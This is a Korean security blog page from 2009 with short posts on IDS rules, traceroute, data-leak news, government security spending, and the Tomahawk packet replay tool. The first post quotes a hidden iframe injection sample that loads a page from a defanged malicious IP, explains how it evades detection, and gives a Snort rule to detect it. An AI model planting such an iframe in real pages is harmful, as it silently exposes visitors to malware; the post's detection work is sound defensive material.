<iframe name=c24 src='hxxp://205.234.243.220/d/index.php?'+Math.round(Math.random()*28396)+'9c10b5bc42d8' width=62 height=458 style='visibility:hidden'></iframe>

iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.

그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..

위 코드에서 사용된 style='visibility:hidden' 은 iframe을 보이지 않게한다..
 이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.

여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style='visibility:hidden' 옵션을 써서 iframe을 숨길까?

alert tcp $EXTERNAL_NET $HTTP_PORTS->$HOME_NET any(msg:"iframe evation attack-visibility:hidden"; flow:established,from_server; content:"<iframe"; nocase; pcre:"/<iframe.{0,40}src=('|")(http|ftp)://.*(width|height)=[^=0].*style=('|")visibility:(\s)?hidden('|")/i"; sid:XXXXXXX; rev:1;)

오탐 발생하면 알려주시고 고칠 부분이 있으면 comment 달아주십시요..^^

ps. 위 iframe 코드를 제공해준 나의 영원한 동반자인 이지스(bscry) 고맙다..

Websense에서도 동일한 날짜(?)에 포스팅된게 있네요..그래서 패턴을 좀 바꿔봤습니다.

http://securitylabs.websense.com/content/Alerts/3488.aspx

Posted by regexkorea
보안 이야기2009. 10. 8. 16:28

tracert와 traceroute의 기능은 경로까지 다다르는 시간을 표시해준다..
tracert는 Windows계열에서 사용하는 명령이고, traceroute는 Unix/Linux에서 사용하는 명령이다.

보통 icmp 프로토콜을 사용하여 request와 reponse 값을 받는 다고 생각한다.

tracert는 icmp request를 보내서 icmp reponse를 받는다.
traceroute는 upd 30000번 이상의 포트로 request 하고 icmp response를 받는다.

진짜일까? 그럼 무존건 패킷을 떠보고 눈으로 확인해보는게 최고다.. ^^

 
traceroute에서 icmp request를 하는 옵션을 제공한다.
Posted by regexkorea
보안 사이트 소개2009. 10. 8. 15:48
https://safeweb.norton.com/

꽤 괜찮은 사이트이다.. 기존에 분석이 되지 않았을 경우에는 예약을 자동으로 해준다..
근데 언제 분석이 되는 걸까? ^^

'보안 사이트 소개' 카테고리의 다른 글

오늘의 자료  (0) 2014.02.06
regex 테스트 사이트  (1) 2012.02.22
참고 사이트  (0) 2012.02.21
WireShark 공부 방법  (0) 2011.04.19
대학 CERT 연합  (0) 2010.02.23
Posted by regexkorea
보안 이야기2009. 9. 28. 13:16

OK캐쉬백 콜센터, 고객정보 2만건 유출...보안관리 엉망!

 

해마다 생기는 대기업들은 보안사고..

보안이 눈에 보이는 이득을 주지는 않지만, 한번 보안사고가 커지면 억대의 피해와 회사 이미지에 큰 타격을 주는데

현실은 그렇지가 않네요.

 

내부 인력의 정보 유출에 대한 프로세스가 절실합니다..

ISMS 27001에도 역시 아웃소싱에 대한 보안 부분이 있던데..

개인정보를 가지고 있는 회사는 적어도 이런류의 인증을 필히 받게끔 해야될것 같습니다.

 

래야 보안 인력 자리가 늘겠죠? ^^;


Posted by regexkorea
보안 이야기2009. 9. 28. 13:00

정부, DDoS 방어장비 구축 200억 투입

드디어 200억 예산을 집행한다고 하네요..

연말까지 설치가 목표라고 하던데..

 

국회의원 보좌관인 친구가 국감때문에 저에게 도움을 청해서 다녀왔습니다..^^

해당 국회의원이 행안부쪽의원회라서..DDoS에 대해 이것저것 얘기했었는데..

그중에 200억 언제 집행되냐? 장비만 사서 되겠냐..인력이 필요한테 인력 충원을 매번 계약직으로만 한다.

뭐 이래 저래 하소연했었는데..

오늘 인터넷 신문에 나오네요..^^

 

기자가 엿들었나...^^;

 

장비는 단순히 센서 일뿐 사람이 모든 걸 컨트롤해야한다는걸 잊지 말아야겠습니다..

Posted by regexkorea
보안 이야기2009. 9. 24. 08:27


메일을 확인하는데 신한은행에서 무슨 상품이기에 저렇게 광고를 하나 해서 메일을 읽어보았다..


아니나 다를까 온라인 도박 사이트를 소개하는 스팸 메일이었다..
갈수록 사회공학을 이용한 스팸메일이 증가하고, 더욱 교묘해지고 있다는 것을 확인 할 수 있었다.
앞으로 메일을 미리 볼수 있는 기능을 추가해야하는게 아닌가 하는 생각이 든다..
Posted by regexkorea
보안 이야기2009. 9. 23. 17:48

본의 아니게 이스트 소프트와 경쟁(?)을 하게 된 안철수연구소에서 V3Zip을 내놓았다.
이스트 소프트의 패키지형태 배포때문에 그런것 같은데.. 이러다가 이스트 소프트에서 내놓은거 다 내놓을듯 한데..ㅜㅜ


근데 역시 알집 만큼 이쁘지가 않네요..^^  V자에 너무 집착하신건가? ^^;

Posted by regexkorea
보안 이야기2009. 9. 23. 10:59

김희정 원장 “보안 전투력 확 키운다”
출처 : ZDNet Korea

KISA 분석대응인력을 300명까지 늘린다고 한다.. KISA가 통합되었다고 하더라도 송파에 있는 건물에는 사람들도 많은데 그 인력들을 어디에 배치를 하려고 하는건지..뭐 KISA에서 고민해야하는 일이니깐 패스~ ㅋㅋㅋ
근데 문제는 고용형태가 계약직(위촉직)일꺼라는 것이다. 안정적이지 않은 직장에 다니고자하는 사람들은 없을 것이다.
그렇다고 300명을 다 신입으로 뽑을 수는 없는 일이고..
연봉은 어떠한가? 자세한 연봉 수준은 모르겠지만 떠도는 이야기로는 박봉이라고 한다. KISA 방문할때 노조에서 임금인상으로 투쟁(?)했던것으로 아는데..

현실적으로 많은 벽에 부딪힐것 같다는 생각이다.. 뭐 개인적인 사견이었습니다..^^
Posted by regexkorea
보안 프로그램2009. 9. 22. 10:18

여기서 말하는 토마호크는 군사용 미사일이 아니다..^^
 패킷을 재생시켜주는 도구 이다.. 예를 들어 CC 인증시 탐지 테스트를 할때 각 패턴에 대해서 모의 해킹 형식으로 해서 탐지테스트를 할것인가? 그러기 위해서는 여러 PC들이 필요하고 각종 취약성이 설치되어야하는 번거로움이 생긴다..
패턴을 개발시 테스트했던 트래픽을 가지고 재생하면 얼마나 편한가.. 뭐 그런용도는 아마 토마호크의 일부분일 것이다..

토마호크가 무엇인지, 설치하기 위해 무엇이 필요한지에 대해 아래 사이트에서 확인 할 수 있다.
http://tomahawk.sourceforge.net/ 

Download

To compile Tomahawk, you'll need to get Libnet 1.02a and Libpcap 0.8.1, as well as the Tomahawk source:

For your convenience, the following binaries are available:


우선 토마호크를 설치하기위한 사양은 다음과 같다.
     o 1.4+ GHz processor
     o At least 512 MB RAM
     o Two gigabit test NICs.  The Intel Pro1000 adapters are inexpensive
        and work well.  If you have only one PCI slot, the Intel dual port
        Pro1000 can be used.
     o One NIC for management

운영체제는 기본적으로 리눅스를 이용하면 되며,  Libnet 1.02a, Libpcap 0.8.1 이 필수적으로 설치가 되어있어야 한다.

Libpcap 0.8.1
http://sourceforge.net/projects/libpcap/

Libnet 1.02a
http://www.filewatcher.com/m/libnet-1.0.2a.tar.gz.140191.0.0.html

Release 1.1 또는 Release 1.0을 선택해서 설치하면된다.
유의해야할 사항은 Libpcap 0.8.1 과 Libnet 1.02a, Tomahawk 는 /usr/local 경로에서 설치하여야한다..
자세한 사항은 Tomahawk 파일을 풀어서 INSTALL 을 읽고 따라하면된다.

소스 컴파일이 안된다면 For your convenience, the following binaries are available:  가있다.
Redhat 7 또는 이후의 리눅스에서 컴파일한 바이너리를 다운로드 받아서 그냥 /bin 파일에 올려 놓으면 된다..

다 귀찮으면 그냥 Redhat 7 계열 리눅스 설치하고 Tomahawk 바이너리 다운로드 받으면 해결된다..^^

'보안 프로그램' 카테고리의 다른 글

Digital Forensic SIFTing: SUPER Timeline Creation using log2timeline-sift  (0) 2012.06.25
Backtrack IP 설정  (0) 2011.12.13
Packet Generator Tool  (0) 2011.11.21
nc 응답 테스트  (1) 2011.04.19
Penetration Testing Tools  (0) 2009.10.14
Posted by regexkorea
보안 이야기2009. 9. 16. 14:58

BC카드사 고객정보 유출, 주인 모르게 인터넷결제

 

젠장 BC카드 고객인데...ㅜㅜ

BC카드에서 발송하는 광고 관련 메일에도 문제가 있습니다.
예전에 BC카드 면접볼때 얘기했었는데 고쳐지지 않더군요..

이미지에 링크 걸려있는 URI를 보면 인자 값 전달하는데 주민등록번호로 씁니다..

고객메일로 보내니깐 상관없다는 식인거 같던데.. 만약에 메일이 잘못보내지면 어떻게 하려고..^^

Posted by regexkorea